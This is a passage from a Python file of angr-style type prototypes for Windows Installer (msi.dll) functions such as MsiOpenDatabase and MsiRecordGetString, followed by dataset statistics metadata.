'MsiDatabaseGetPrimaryKeysW': SimTypeFunction([SimTypeInt(signed=False, label="UInt32"), SimTypePointer(SimTypeChar(label="Char"), offset=0), SimTypePointer(SimTypeInt(signed=False, label="UInt32"), offset=0)], SimTypeInt(signed=False, label="UInt32"), arg_names=["hDatabase", "szTableName", "phRecord"]),
#
'MsiDatabaseIsTablePersistentA': SimTypeFunction([SimTypeInt(signed=False, label="UInt32"), SimTypePointer(SimTypeChar(label="Byte"), offset=0)], SimTypeInt(signed=False, label="MSICONDITION"), arg_names=["hDatabase", "szTableName"]),
#
'MsiDatabaseIsTablePersistentW': SimTypeFunction([SimTypeInt(signed=False, label="UInt32"), SimTypePointer(SimTypeChar(label="Char"), offset=0)], SimTypeInt(signed=False, label="MSICONDITION"), arg_names=["hDatabase", "szTableName"]),
#
'MsiGetSummaryInformationA': SimTypeFunction([SimTypeInt(signed=False, label="UInt32"), SimTypePointer(SimTypeChar(label="Byte"), offset=0), SimTypeInt(signed=False, label="UInt32"), SimTypePointer(SimTypeInt(signed=False, label="UInt32"), offset=0)], SimTypeInt(signed=False, label="UInt32"), arg_names=["hDatabase", "szDatabasePath", "uiUpdateCount", "phSummaryInfo"]),
#
'MsiGetSummaryInformationW': SimTypeFunction([SimTypeInt(signed=False, label="UInt32"), SimTypePointer(SimTypeChar(label="Char"), offset=0), SimTypeInt(signed=False, label="UInt32"), SimTypePointer(SimTypeInt(signed=False, label="UInt32"), offset=0)], SimTypeInt(signed=False, label="UInt32"), arg_names=["hDatabase", "szDatabasePath", "uiUpdateCount", "phSummaryInfo"]),
#
'MsiSummaryInfoGetPropertyCount': SimTypeFunction([SimTypeInt(signed=False, label="UInt32"), SimTypePointer(SimTypeInt(signed=False, label="UInt32"), offset=0)], SimTypeInt(signed=False, label="UInt32"), arg_names=["hSummaryInfo", "puiPropertyCount"]),
#
'MsiSummaryInfoSetPropertyA': SimTypeFunction([SimTypeInt(signed=False, label="UInt32"), SimTypeInt(signed=False, label="UInt32"), SimTypeInt(signed=False, label="UInt32"), SimTypeInt(signed=True, label="Int32"), SimTypePointer(SimStruct({"dwLowDateTime": SimTypeInt(signed=False, label="UInt32"), "dwHighDateTime": SimTypeInt(signed=False, label="UInt32")}, name="FILETIME", pack=False, align=None), offset=0), SimTypePointer(SimTypeChar(label="Byte"), offset=0)], SimTypeInt(signed=False, label="UInt32"), arg_names=["hSummaryInfo", "uiProperty", "uiDataType", "iValue", "pftValue", "szValue"]),
#
'MsiSummaryInfoSetPropertyW': SimTypeFunction([SimTypeInt(signed=False, label="UInt32"), SimTypeInt(signed=False, label="UInt32"), SimTypeInt(signed=False, label="UInt32"), SimTypeInt(signed=True, label="Int32"), SimTypePointer(SimStruct({"dwLowDateTime": SimTypeInt(signed=False, label="UInt32"), "dwHighDateTime": SimTypeInt(signed=False, label="UInt32")}, name="FILETIME", pack=False, align=None), offset=0), SimTypePointer(SimTypeChar(label="Char"), offset=0)], SimTypeInt(signed=False, label="UInt32"), arg_names=["hSummaryInfo", "uiProperty", "uiDataType", "iValue", "pftValue", "szValue"]),
#
'MsiSummaryInfoGetPropertyA': SimTypeFunction([SimTypeInt(signed=False, label="UInt32"), SimTypeInt(signed=False, label="UInt32"), SimTypePointer(SimTypeInt(signed=False, label="UInt32"), offset=0), SimTypePointer(SimTypeInt(signed=True, label="Int32"), offset=0), SimTypePointer(SimStruct({"dwLowDateTime": SimTypeInt(signed=False, label="UInt32"), "dwHighDateTime": SimTypeInt(signed=False, label="UInt32")}, name="FILETIME", pack=False, align=None), offset=0), SimTypePointer(SimTypeChar(label="Byte"), label="LPArray", offset=0), SimTypePointer(SimTypeInt(signed=False, label="UInt32"), offset=0)], SimTypeInt(signed=False, label="UInt32"), arg_names=["hSummaryInfo", "uiProperty", "puiDataType", "piValue", "pftValue", "szValueBuf", "pcchValueBuf"]),
#
'MsiSummaryInfoGetPropertyW': SimTypeFunction([SimTypeInt(signed=False, label="UInt32"), SimTypeInt(signed=False, label="UInt32"), SimTypePointer(SimTypeInt(signed=False, label="UInt32"), offset=0), SimTypePointer(SimTypeInt(signed=True, label="Int32"), offset=0), SimTypePointer(SimStruct({"dwLowDateTime": SimTypeInt(signed=False, label="UInt32"), "dwHighDateTime": SimTypeInt(signed=False, label="UInt32")}, name="FILETIME", pack=False, align=None), offset=0), SimTypePointer(SimTypeChar(label="Char"), label="LPArray", offset=0), SimTypePointer(SimTypeInt(signed=False, label="UInt32"), offset=0)], SimTypeInt(signed=False, label="UInt32"), arg_names=["hSummaryInfo", "uiProperty", "puiDataType", "piValue", "pftValue", "szValueBuf", "pcchValueBuf"]),
#
'MsiSummaryInfoPersist': SimTypeFunction([SimTypeInt(signed=False, label="UInt32")], SimTypeInt(signed=False, label="UInt32"), arg_names=["hSummaryInfo"]),
#
'MsiOpenDatabaseA': SimTypeFunction([SimTypePointer(SimTypeChar(label="Byte"), offset=0), SimTypePointer(SimTypeChar(label="Byte"), offset=0), SimTypePointer(SimTypeInt(signed=False, label="UInt32"), offset=0)], SimTypeInt(signed=False, label="UInt32"), arg_names=["szDatabasePath", "szPersist", "phDatabase"]),
#
'MsiOpenDatabaseW': SimTypeFunction([SimTypePointer(SimTypeChar(label="Char"), offset=0), SimTypePointer(SimTypeChar(label="Char"), offset=0), SimTypePointer(SimTypeInt(signed=False, label="UInt32"), offset=0)], SimTypeInt(signed=False, label="UInt32"), arg_names=["szDatabasePath", "szPersist", "phDatabase"]),
#
'MsiDatabaseImportA': SimTypeFunction([SimTypeInt(signed=False, label="UInt32"), SimTypePointer(SimTypeChar(label="Byte"), offset=0), SimTypePointer(SimTypeChar(label="Byte"), offset=0)], SimTypeInt(signed=False, label="UInt32"), arg_names=["hDatabase", "szFolderPath", "szFileName"]),
#
'MsiDatabaseImportW': SimTypeFunction([SimTypeInt(signed=False, label="UInt32"), SimTypePointer(SimTypeChar(label="Char"), offset=0), SimTypePointer(SimTypeChar(label="Char"), offset=0)], SimTypeInt(signed=False, label="UInt32"), arg_names=["hDatabase", "szFolderPath", "szFileName"]),
#
'MsiDatabaseExportA': SimTypeFunction([SimTypeInt(signed=False, label="UInt32"), SimTypePointer(SimTypeChar(label="Byte"), offset=0), SimTypePointer(SimTypeChar(label="Byte"), offset=0), SimTypePointer(SimTypeChar(label="Byte"), offset=0)], SimTypeInt(signed=False, label="UInt32"), arg_names=["hDatabase", "szTableName", "szFolderPath", "szFileName"]),
#
'MsiDatabaseExportW': SimTypeFunction([SimTypeInt(signed=False, label="UInt32"), SimTypePointer(SimTypeChar(label="Char"), offset=0), SimTypePointer(SimTypeChar(label="Char"), offset=0), SimTypePointer(SimTypeChar(label="Char"), offset=0)], SimTypeInt(signed=False, label="UInt32"), arg_names=["hDatabase", "szTableName", "szFolderPath", "szFileName"]),
#
'MsiDatabaseMergeA': SimTypeFunction([SimTypeInt(signed=False, label="UInt32"), SimTypeInt(signed=False, label="UInt32"), SimTypePointer(SimTypeChar(label="Byte"), offset=0)], SimTypeInt(signed=False, label="UInt32"), arg_names=["hDatabase", "hDatabaseMerge", "szTableName"]),
#
'MsiDatabaseMergeW': SimTypeFunction([SimTypeInt(signed=False, label="UInt32"), SimTypeInt(signed=False, label="UInt32"), SimTypePointer(SimTypeChar(label="Char"), offset=0)], SimTypeInt(signed=False, label="UInt32"), arg_names=["hDatabase", "hDatabaseMerge", "szTableName"]),
#
'MsiDatabaseGenerateTransformA': SimTypeFunction([SimTypeInt(signed=False, label="UInt32"), SimTypeInt(signed=False, label="UInt32"), SimTypePointer(SimTypeChar(label="Byte"), offset=0), SimTypeInt(signed=True, label="Int32"), SimTypeInt(signed=True, label="Int32")], SimTypeInt(signed=False, label="UInt32"), arg_names=["hDatabase", "hDatabaseReference", "szTransformFile", "iReserved1", "iReserved2"]),
#
'MsiDatabaseGenerateTransformW': SimTypeFunction([SimTypeInt(signed=False, label="UInt32"), SimTypeInt(signed=False, label="UInt32"), SimTypePointer(SimTypeChar(label="Char"), offset=0), SimTypeInt(signed=True, label="Int32"), SimTypeInt(signed=True, label="Int32")], SimTypeInt(signed=False, label="UInt32"), arg_names=["hDatabase", "hDatabaseReference", "szTransformFile", "iReserved1", "iReserved2"]),
#
'MsiDatabaseApplyTransformA': SimTypeFunction([SimTypeInt(signed=False, label="UInt32"), SimTypePointer(SimTypeChar(label="Byte"), offset=0), SimTypeInt(signed=False, label="MSITRANSFORM_ERROR")], SimTypeInt(signed=False, label="UInt32"), arg_names=["hDatabase", "szTransformFile", "iErrorConditions"]),
#
'MsiDatabaseApplyTransformW': SimTypeFunction([SimTypeInt(signed=False, label="UInt32"), SimTypePointer(SimTypeChar(label="Char"), offset=0), SimTypeInt(signed=False, label="MSITRANSFORM_ERROR")], SimTypeInt(signed=False, label="UInt32"), arg_names=["hDatabase", "szTransformFile", "iErrorConditions"]),
#
'MsiCreateTransformSummaryInfoA': SimTypeFunction([SimTypeInt(signed=False, label="UInt32"), SimTypeInt(signed=False, label="UInt32"), SimTypePointer(SimTypeChar(label="Byte"), offset=0), SimTypeInt(signed=False, label="MSITRANSFORM_ERROR"), SimTypeInt(signed=False, label="MSITRANSFORM_VALIDATE")], SimTypeInt(signed=False, label="UInt32"), arg_names=["hDatabase", "hDatabaseReference", "szTransformFile", "iErrorConditions", "iValidation"]),
#
'MsiCreateTransformSummaryInfoW': SimTypeFunction([SimTypeInt(signed=False, label="UInt32"), SimTypeInt(signed=False, label="UInt32"), SimTypePointer(SimTypeChar(label="Char"), offset=0), SimTypeInt(signed=False, label="MSITRANSFORM_ERROR"), SimTypeInt(signed=False, label="MSITRANSFORM_VALIDATE")], SimTypeInt(signed=False, label="UInt32"), arg_names=["hDatabase", "hDatabaseReference", "szTransformFile", "iErrorConditions", "iValidation"]),
#
'MsiDatabaseCommit': SimTypeFunction([SimTypeInt(signed=False, label="UInt32")], SimTypeInt(signed=False, label="UInt32"), arg_names=["hDatabase"]),
#
'MsiGetDatabaseState': SimTypeFunction([SimTypeInt(signed=False, label="UInt32")], SimTypeInt(signed=False, label="MSIDBSTATE"), arg_names=["hDatabase"]),
#
'MsiCreateRecord': SimTypeFunction([SimTypeInt(signed=False, label="UInt32")], SimTypeInt(signed=False, label="UInt32"), arg_names=["cParams"]),
#
'MsiRecordIsNull': SimTypeFunction([SimTypeInt(signed=False, label="UInt32"), SimTypeInt(signed=False, label="UInt32")], SimTypeInt(signed=True, label="Int32"), arg_names=["hRecord", "iField"]),
#
'MsiRecordDataSize': SimTypeFunction([SimTypeInt(signed=False, label="UInt32"), SimTypeInt(signed=False, label="UInt32")], SimTypeInt(signed=False, label="UInt32"), arg_names=["hRecord", "iField"]),
#
'MsiRecordSetInteger': SimTypeFunction([SimTypeInt(signed=False, label="UInt32"), SimTypeInt(signed=False, label="UInt32"), SimTypeInt(signed=True, label="Int32")], SimTypeInt(signed=False, label="UInt32"), arg_names=["hRecord", "iField", "iValue"]),
#
'MsiRecordSetStringA': SimTypeFunction([SimTypeInt(signed=False, label="UInt32"), SimTypeInt(signed=False, label="UInt32"), SimTypePointer(SimTypeChar(label="Byte"), offset=0)], SimTypeInt(signed=False, label="UInt32"), arg_names=["hRecord", "iField", "szValue"]),
#
'MsiRecordSetStringW': SimTypeFunction([SimTypeInt(signed=False, label="UInt32"), SimTypeInt(signed=False, label="UInt32"), SimTypePointer(SimTypeChar(label="Char"), offset=0)], SimTypeInt(signed=False, label="UInt32"), arg_names=["hRecord", "iField", "szValue"]),
#
'MsiRecordGetInteger': SimTypeFunction([SimTypeInt(signed=False, label="UInt32"), SimTypeInt(signed=False, label="UInt32")], SimTypeInt(signed=True, label="Int32"), arg_names=["hRecord", "iField"]),
#
'MsiRecordGetStringA': SimTypeFunction([SimTypeInt(signed=False, label="UInt32"), SimTypeInt(signed=False, label="UInt32"), SimTypePointer(SimTypeChar(label="Byte"), label="LPArray", offset=0), SimTypePointer(SimTypeInt(signed=False, label="UInt32"), offset=0)], SimTypeInt(signed=False, label="UInt32"), arg_names=["hRecord", "iField", "szValueBuf", "pcchValueBuf"]),
#
'MsiRecordGetStringW': SimTypeFunction([SimTypeInt(signed=False, label="UInt32"), SimTypeInt(signed=False, label="UInt32"), SimTypePointer(SimTypeChar(label="Char"), label="LPArray", offset=0), SimTypePointer(SimTypeInt(signed=False, label="UInt32"), offset=0)], SimTypeInt(signed=False, label="UInt32"), arg_names=["hRecord", "iField", "szValueBuf", "pcchValueBuf"]),
#
'MsiRecordGetFieldCount': SimTypeFunction([SimTypeInt(signed=False, label="UInt32")], SimTypeInt(signed=False, label="UInt32"), arg_names=["hRecord"]),
#
'MsiRecordSetStreamA': SimTypeFunction([SimTypeInt(signed=False, label="UInt32"), SimTypeInt(signed=False, label="UInt32"), SimTypePointer(SimTypeChar(label="Byte"), offset=0)], SimTypeInt(signed=False, label="UInt32"), arg_names=["hRecord", "iField", "szFilePath"]),
#
'MsiRecordSetStreamW': SimTypeFunction([SimTypeInt(signed=False, label="UInt32"), SimTypeInt(signed=False, label="UInt32"), SimTypePointer(SimTypeChar(label="Char"), offset=0)], SimTypeInt(signed=False, label="UInt32"), arg_names=["hRecord", "iField", "szFilePath"]),
#
'MsiRecordReadStream': SimTypeFunction([SimTypeInt(signed=False, label="UInt32"), SimTypeInt(signed=False, label="UInt32"), SimTypePointer(SimTypeChar(label="Byte"), offset=0), SimTypePointer(SimTypeInt(signed=False, label="UInt32"), offset=0)], SimTypeInt(signed=False, label="UInt32"), arg_names=["hRecord", "iField", "szDataBuf", "pcbDataBuf"]),
#
'MsiRecordClearData': SimTypeFunction([SimTypeInt(signed=False, label="UInt32")], SimTypeInt(signed=False, label="UInt32"), arg_names=["hRecord"]),
#
'MsiGetActiveDatabase': SimTypeFunction([SimTypeInt(signed=False, label="UInt32")], SimTypeInt(signed=False, label="UInt32"), arg_names=["hInstall"]),
#
'MsiSetPropertyA': SimTypeFunction([SimTypeInt(signed=False, label="UInt32"), SimTypePointer(SimTypeChar(label="Byte"), offset=0), SimTypePointer(SimTypeChar(label="Byte"), offset=0)], SimTypeInt(signed=False, label="UInt32"), arg_names=["hInstall", "szName", "szValue"]),
#
'MsiSetPropertyW': SimTypeFunction([SimTypeInt(signed=False, label="UInt32"), SimTypePointer(SimTypeChar(label="Char"), offset=0), SimTypePointer(SimTypeChar(label="Char"), offset=0)], SimTypeInt(signed=False, label="UInt32"), arg_names=["hInstall", "szName", "szValue"]),
#
'MsiGetPropertyA': SimTypeFunction([SimTypeInt(signed=False, label="UInt32"), SimTypePointer(SimTypeChar(label="Byte"), offset=0), SimTypePointer(SimTypeChar(label="Byte"), label="LPArray", offset=0), SimTypePointer(SimTypeInt(signed=False, label="UInt32"), offset=0)], SimTypeInt(signed=False, label="UInt32"), arg_names=["hInstall", "szName", "szValueBuf", "pcchValueBuf"]),
#
'MsiGetPropertyW': SimTypeFunction([SimTypeInt(signed=False, label="UInt32"), SimTypePointer(SimTypeChar(label="Char"), offset=0), SimTypePointer(SimTypeChar(label="Char"), label="LPArray", offset=0), SimTypePointer(SimTypeInt(signed=False, label="UInt32"), offset=0)], SimTypeInt(signed=False, label="UInt32"), arg_names=["hInstall", "szName", "szValueBuf", "pcchValueBuf"]),
#
'MsiGetLanguage': SimTypeFunction([SimTypeInt(signed=False, label="UInt32")], SimTypeShort(signed=False, label="UInt16"), arg_names=["hInstall"]),
#
'MsiGetMode': SimTypeFunction([SimTypeInt(signed=False, label="UInt32"), SimTypeInt(signed=False, label="MSIRUNMODE")], SimTypeInt(signed=True, label="Int32"), arg_names=["hInstall", "eRunMode"]),
#
'MsiSetMode': SimTypeFunction([SimTypeInt(signed=False, label="UInt32"), SimTypeInt(signed=False, label="MSIRUNMODE"), SimTypeInt(signed=True, label="Int32")], SimTypeInt(signed=False, label="UInt32"), arg_names=["hInstall", "eRunMode", "fState"]),
#
'MsiFormatRecordA': SimTypeFunction([SimTypeInt(signed=False, label="UInt32"), SimTypeInt(signed=False, label="UInt32"), SimTypePointer(SimTypeChar(label="Byte"), label="LPArray", offset=0), SimTypePointer(SimTypeInt(signed=False, label="UInt32"), offset=0)], SimTypeInt(signed=False, label="UInt32"), arg_names=["hInstall", "hRecord", "szResultBuf", "pcchResultBuf"]),
#
'MsiFormatRecordW': SimTypeFunction([SimTypeInt(signed=False, label="UInt32"), SimTypeInt(signed=False, label="UInt32"), SimTypePointer(SimTypeChar(label="Char"), label="LPArray", offset=0), SimTypePointer(SimTypeInt(signed=False, label="UInt32"), offset=0)], SimTypeInt(signed=False, label="UInt32"), arg_names=["hInstall", "hRecord", "szResultBuf", "pcchResultBuf"]),
#
'MsiDoActionA': SimTypeFunction([SimTypeInt(signed=False, label="UInt32"), SimTypePointer(SimTypeChar(label="Byte"), offset=0)], SimTypeInt(signed=False, label="UInt32"), arg_names=["hInstall", "szAction"]),
#
'MsiDoActionW': SimTypeFunction([SimTypeInt(signed=False, label="UInt32"), SimTypePointer(SimTypeChar(label="Char"), offset=0)], SimTypeInt(signed=False, label="UInt32"), arg_names=["hInstall", "szAction"]),
#
'MsiSequenceA': SimTypeFunction([SimTypeInt(signed=False, label="UInt32"), SimTypePointer(SimTypeChar(label="Byte"), offset=0), SimTypeInt(signed=True, label="Int32")], SimTypeInt(signed=False, label="UInt32"), arg_names=["hInstall", "szTable", "iSequenceMode"]),
#
'MsiSequenceW': SimTypeFunction([SimTypeInt(signed=False, label="UInt32"), SimTypePointer(SimTypeChar(label="Char"), offset=0), SimTypeInt(signed=True, label="Int32")], SimTypeInt(signed=False, label="UInt32"), arg_names=["hInstall", "szTable", "iSequenceMode"]),
#
'MsiProcessMessage': SimTypeFunction([SimTypeInt(signed=False, label="UInt32"), SimTypeInt(signed=False, label="INSTALLMESSAGE"), SimTypeInt(signed=False, label="UInt32")], SimTypeInt(signed=True, label="Int32"), arg_names=["hInstall", "eMessageType", "hRecord"]),
#
'MsiEvaluateConditionA': SimTypeFunction([SimTypeInt(signed=False, label="UInt32"), SimTypePointer(SimTypeChar(label="Byte"), offset=0)], SimTypeInt(signed=False, label="MSICONDITION"), arg_names=["hInstall", "szCondition"]),
#
'MsiEvaluateConditionW': SimTypeFunction([SimTypeInt(signed=False, label="UInt32"), SimTypePointer(SimTypeChar(label="Char"), offset=0)], SimTypeInt(signed=False, label="MSICONDITION"), arg_names=["hInstall", "szCondition"]),
#
'MsiGetFeatureStateA': SimTypeFunction([SimTypeInt(signed=False, label="UInt32"), SimTypePointer(SimTypeChar(label="Byte"), offset=0), SimTypePointer(SimTypeInt(signed=False, label="INSTALLSTATE"), offset=0), SimTypePointer(SimTypeInt(signed=False, label="INSTALLSTATE"), offset=0)], SimTypeInt(signed=False, label="UInt32"), arg_names=["hInstall", "szFeature", "piInstalled", "piAction"]),
#
'MsiGetFeatureStateW': SimTypeFunction([SimTypeInt(signed=False, label="UInt32"), SimTypePointer(SimTypeChar(label="Char"), offset=0), SimTypePointer(SimTypeInt(signed=False, label="INSTALLSTATE"), offset=0), SimTypePointer(SimTypeInt(signed=False, label="INSTALLSTATE"), offset=0)], SimTypeInt(signed=False, label="UInt32"), arg_names=["hInstall", "szFeature", "piInstalled", "piAction"]),
#
'MsiSetFeatureStateA': SimTypeFunction([SimTypeInt(signed=False, label="UInt32"), SimTypePointer(SimTypeChar(label="Byte"), offset=0), SimTypeInt(signed=False, label="INSTALLSTATE")], SimTypeInt(signed=False, label="UInt32"), arg_names=["hInstall", "szFeature", "iState"]),
#
'MsiSetFeatureStateW': SimTypeFunction([SimTypeInt(signed=False, label="UInt32"), SimTypePointer(SimTypeChar(label="Char"), offset=0), SimTypeInt(signed=False, label="INSTALLSTATE")], SimTypeInt(signed=False, label="UInt32"), arg_names=["hInstall", "szFeature", "iState"]),
#
'MsiSetFeatureAttributesA': SimTypeFunction([SimTypeInt(signed=False, label="UInt32"), SimTypePointer(SimTypeChar(label="Byte"), offset=0), SimTypeInt(signed=False, label="UInt32")], SimTypeInt(signed=False, label="UInt32"), arg_names=["hInstall", "szFeature", "dwAttributes"]),
#
'MsiSetFeatureAttributesW': SimTypeFunction([SimTypeInt(signed=False, label="UInt32"), SimTypePointer(SimTypeChar(label="Char"), offset=0), SimTypeInt(signed=False, label="UInt32")], SimTypeInt(signed=False, label="UInt32"), arg_names=["hInstall", "szFeature", "dwAttributes"]),
#
'MsiGetComponentStateA': SimTypeFunction([SimTypeInt(signed=False, label="UInt32"), SimTypePointer(SimTypeChar(label="Byte"), offset=0), SimTypePointer(SimTypeInt(signed=False, label="INSTALLSTATE"), offset=0), SimTypePointer(SimTypeInt(signed=False, label="INSTALLSTATE"), offset=0)], SimTypeInt(signed=False, label="UInt32"), arg_names=["hInstall", "szComponent", "piInstalled", "piAction"]),
#
'MsiGetComponentStateW': SimTypeFunction([SimTypeInt(signed=False, label="UInt32"), SimTypePointer(SimTypeChar(label="Char"), offset=0), SimTypePointer(SimTypeInt(signed=False, label="INSTALLSTATE"), offset=0), SimTypePointer(SimTypeInt(signed=False, label="INSTALLSTATE"), offset=0)], SimTypeInt(signed=False, label="UInt32"), arg_names=["hInstall", "szComponent", "piInstalled", "piAction"]),
#
'MsiSetComponentStateA': SimTypeFunction([SimTypeInt(signed=False, label="UInt32"), SimTypePointer(SimTypeChar(label="Byte"), offset=0), SimTypeInt(signed=False, label="INSTALLSTATE")], SimTypeInt(signed=False, label="UInt32"), arg_names=["hInstall", "szComponent", "iState"]),
#
'MsiSetComponentStateW': SimTypeFunction([SimTypeInt(signed=False, label="UInt32"), SimTypePointer(SimTypeChar(label="Char"), offset=0), SimTypeInt(signed=False, label="INSTALLSTATE")], SimTypeInt(signed=False, label="UInt32"), arg_names=["hInstall", "szComponent", "iState"]),
#
'MsiGetFeatureCostA': SimTypeFunction([SimTypeInt(signed=False, label="UInt32"), SimTypePointer(SimTypeChar(label="Byte"), offset=0), SimTypeInt(signed=False, label="MSICOSTTREE"), SimTypeInt(signed=False, label="INSTALLSTATE"), SimTypePointer(SimTypeInt(signed=True, label="Int32"), offset=0)], SimTypeInt(signed=False, label="UInt32"), arg_names=["hInstall", "szFeature", "iCostTree", "iState", "piCost"]),
#
'MsiGetFeatureCostW': SimTypeFunction([SimTypeInt(signed=False, label="UInt32"), SimTypePointer(SimTypeChar(label="Char"), offset=0), SimTypeInt(signed=False, label="MSICOSTTREE"), SimTypeInt(signed=False, label="INSTALLSTATE"), SimTypePointer(SimTypeInt(signed=True, label="Int32"), offset=0)], SimTypeInt(signed=False, label="UInt32"), arg_names=["hInstall", "szFeature", "iCostTree", "iState", "piCost"]),
#
'MsiEnumComponentCostsA': SimTypeFunction([SimTypeInt(signed=False, label="UInt32"), SimTypePointer(SimTypeChar(label="Byte"), offset=0), SimTypeInt(signed=False, label="UInt32"), SimTypeInt(signed=False, label="INSTALLSTATE"), SimTypePointer(SimTypeChar(label="Byte"), label="LPArray", offset=0), SimTypePointer(SimTypeInt(signed=False, label="UInt32"), offset=0), SimTypePointer(SimTypeInt(signed=True, label="Int32"), offset=0), SimTypePointer(SimTypeInt(signed=True, label="Int32"), offset=0)], SimTypeInt(signed=False, label="UInt32"), arg_names=["hInstall", "szComponent", "dwIndex", "iState", "szDriveBuf", "pcchDriveBuf", "piCost", "piTempCost"]),
#
'MsiEnumComponentCostsW': SimTypeFunction([SimTypeInt(signed=False, label="UInt32"), SimTypePointer(SimTypeChar(label="Char"), offset=0), SimTypeInt(signed=False, label="UInt32"), SimTypeInt(signed=False, label="INSTALLSTATE"), SimTypePointer(SimTypeChar(label="Char"), label="LPArray", offset=0), SimTypePointer(SimTypeInt(signed=False, label="UInt32"), offset=0), SimTypePointer(SimTypeInt(signed=True, label="Int32"), offset=0), SimTypePointer(SimTypeInt(signed=True, label="Int32"), offset=0)], SimTypeInt(signed=False, label="UInt32"), arg_names=["hInstall", "szComponent", "dwIndex", "iState", "szDriveBuf", "pcchDriveBuf", "piCost", "piTempCost"]),
#
'MsiSetInstallLevel': SimTypeFunction([SimTypeInt(signed=False, label="UInt32"), SimTypeInt(signed=True, label="Int32")], SimTypeInt(signed=False, label="UInt32"), arg_names=["hInstall", "iInstallLevel"]),
#
'MsiGetFeatureValidStatesA': SimTypeFunction([SimTypeInt(signed=False, label="UInt32"), SimTypePointer(SimTypeChar(label="Byte"), offset=0), SimTypePointer(SimTypeInt(signed=False, label="UInt32"), offset=0)], SimTypeInt(signed=False, label="UInt32"), arg_names=["hInstall", "szFeature", "lpInstallStates"]),
#
'MsiGetFeatureValidStatesW': SimTypeFunction([SimTypeInt(signed=False, label="UInt32"), SimTypePointer(SimTypeChar(label="Char"), offset=0), SimTypePointer(SimTypeInt(signed=False, label="UInt32"), offset=0)], SimTypeInt(signed=False, label="UInt32"), arg_names=["hInstall", "szFeature", "lpInstallStates"]),
#
'MsiGetSourcePathA': SimTypeFunction([SimTypeInt(signed=False, label="UInt32"), SimTypePointer(SimTypeChar(label="Byte"), offset=0), SimTypePointer(SimTypeChar(label="Byte"), label="LPArray", offset=0), SimTypePointer(SimTypeInt(signed=False, label="UInt32"), offset=0)], SimTypeInt(signed=False, label="UInt32"), arg_names=["hInstall", "szFolder", "szPathBuf", "pcchPathBuf"]),
#
'MsiGetSourcePathW': SimTypeFunction([SimTypeInt(signed=False, label="UInt32"), SimTypePointer(SimTypeChar(label="Char"), offset=0), SimTypePointer(SimTypeChar(label="Char"), label="LPArray", offset=0), SimTypePointer(SimTypeInt(signed=False, label="UInt32"), offset=0)], SimTypeInt(signed=False, label="UInt32"), arg_names=["hInstall", "szFolder", "szPathBuf", "pcchPathBuf"]),
#
'MsiGetTargetPathA': SimTypeFunction([SimTypeInt(signed=False, label="UInt32"), SimTypePointer(SimTypeChar(label="Byte"), offset=0), SimTypePointer(SimTypeChar(label="Byte"), label="LPArray", offset=0), SimTypePointer(SimTypeInt(signed=False, label="UInt32"), offset=0)], SimTypeInt(signed=False, label="UInt32"), arg_names=["hInstall", "szFolder", "szPathBuf", "pcchPathBuf"]),
#
'MsiGetTargetPathW': SimTypeFunction([SimTypeInt(signed=False, label="UInt32"), SimTypePointer(SimTypeChar(label="Char"), offset=0), SimTypePointer(SimTypeChar(label="Char"), label="LPArray", offset=0), SimTypePointer(SimTypeInt(signed=False, label="UInt32"), offset=0)], SimTypeInt(signed=False, label="UInt32"), arg_names=["hInstall", "szFolder", "szPathBuf", "pcchPathBuf"]),
#
'MsiSetTargetPathA': SimTypeFunction([SimTypeInt(signed=False, label="UInt32"), SimTypePointer(SimTypeChar(label="Byte"), offset=0), SimTypePointer(SimTypeChar(label="Byte"), offset=0)], SimTypeInt(signed=False, label="UInt32"), arg_names=["hInstall", "szFolder", "szFolderPath"]),
#
'MsiSetTargetPathW': SimTypeFunction([SimTypeInt(signed=False, label="UInt32"), SimTypePointer(SimTypeChar(label="Char"), offset=0), SimTypePointer(SimTypeChar(label="Char"), offset=0)], SimTypeInt(signed=False, label="UInt32"), arg_names=["hInstall", "szFolder", "szFolderPath"]),
#
'MsiVerifyDiskSpace': SimTypeFunction([SimTypeInt(signed=False, label="UInt32")], SimTypeInt(signed=False, label="UInt32"), arg_names=["hInstall"]),
#
'MsiEnableUIPreview': SimTypeFunction([SimTypeInt(signed=False, label="UInt32"), SimTypePointer(SimTypeInt(signed=False, label="UInt32"), offset=0)], SimTypeInt(signed=False, label="UInt32"), arg_names=["hDatabase", "phPreview"]),
#
'MsiPreviewDialogA': SimTypeFunction([SimTypeInt(signed=False, label="UInt32"), SimTypePointer(SimTypeChar(label="Byte"), offset=0)], SimTypeInt(signed=False, label="UInt32"), arg_names=["hPreview", "szDialogName"]),
#
'MsiPreviewDialogW': SimTypeFunction([SimTypeInt(signed=False, label="UInt32"), SimTypePointer(SimTypeChar(label="Char"), offset=0)], SimTypeInt(signed=False, label="UInt32"), arg_names=["hPreview", "szDialogName"]),
#
'MsiPreviewBillboardA': SimTypeFunction([SimTypeInt(signed=False, label="UInt32"), SimTypePointer(SimTypeChar(label="Byte"), offset=0), SimTypePointer(SimTypeChar(label="Byte"), offset=0)], SimTypeInt(signed=False, label="UInt32"), arg_names=["hPreview", "szControlName", "szBillboard"]),
#
'MsiPreviewBillboardW': SimTypeFunction([SimTypeInt(signed=False, label="UInt32"), SimTypePointer(SimTypeChar(label="Char"), offset=0), SimTypePointer(SimTypeChar(label="Char"), offset=0)], SimTypeInt(signed=False, label="UInt32"), arg_names=["hPreview", "szControlName", "szBillboard"]),
#
'MsiGetLastErrorRecord': SimTypeFunction([], SimTypeInt(signed=False, label="UInt32")),
}
lib.set_prototypes(prototypes)
| 203.3 | 3,845 | 0.733551 | 10,891 | 111,815 | 7.500597 | 0.05757 | 0.165114 | 0.157279 | 0.252715 | 0.923833 | 0.921654 | 0.919928 | 0.919438 | 0.918704 | 0.917051 | 0 | 0.021174 | 0.084711 | 111,815 | 549 | 3,846 | 203.67031 | 0.777015 | 0.00025 | 0 | 0 | 0 | 0 | 0.245009 | 0.032043 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.02518 | 0 | 0.02518 | 0 | 0 | 0 | 0 | null | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 9 |
f2f2d18adc824fe733cd8317ac89b14299f81f21 | 11,468 | py | Python | Expedisi Sederhana.py | dhimasdityaa/Program-Expedisi-Sederhana | 6d17dc165c0b71e4831820a1ee5c2900aa679d99 | [
"MIT"
